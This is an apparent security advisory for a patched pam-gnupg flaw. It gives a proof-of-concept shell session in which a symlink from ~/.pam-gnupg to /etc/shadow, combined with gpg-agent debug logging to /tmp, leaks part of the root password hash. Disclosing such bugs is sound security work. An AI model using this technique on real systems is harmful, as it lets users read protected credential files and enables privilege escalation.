This post describes a security issue in pam-gnupg prior to version 0.1, which was addressed by commit
e4f06d0a.
With a symlink pam-gnupg can be abused to read parts of files the user has no access to.
~$ id
uid=1000(duncan) gid=1000(duncan) groups=12(audio), 13(video), 25(input), 101(xbuilder), 995(socklog), 1000(duncan)
~$ ls -lsa /etc/shadow
8 -r-------- 1 root root 685 Jan 25 19:40 /etc/shadow
$ killall gpg-agent
$ gpg-agent --homedir /home/duncan/.gnupg --use-standard-sock --debug-all --log-file /tmp/gpg-agent
gpg-agent[17336]: reading options from '/home/duncan/.gnupg/gpg-agent.conf'
gpg-agent[17336]: enabled debug flags: mpi crypto memory cache memstat hashing ipc
~$ ls -lsa .pam-gnupg
0 lrwxrwxrwx 1 duncan duncan 11 Feb 14 00:12 .pam-gnupg -> /etc/shadow
~$ su duncan
Password:
~$ grep root /tmp/gpg-agent
2020-02-14 00:40:15 gpg-agent[17337] DBG: chan_8 <- PRESET_PASSPHRASE root:$6$TiwuXXXXXXXXXXXXXXXXXXXXXXXXXXXX -1 44756E63616E3133333721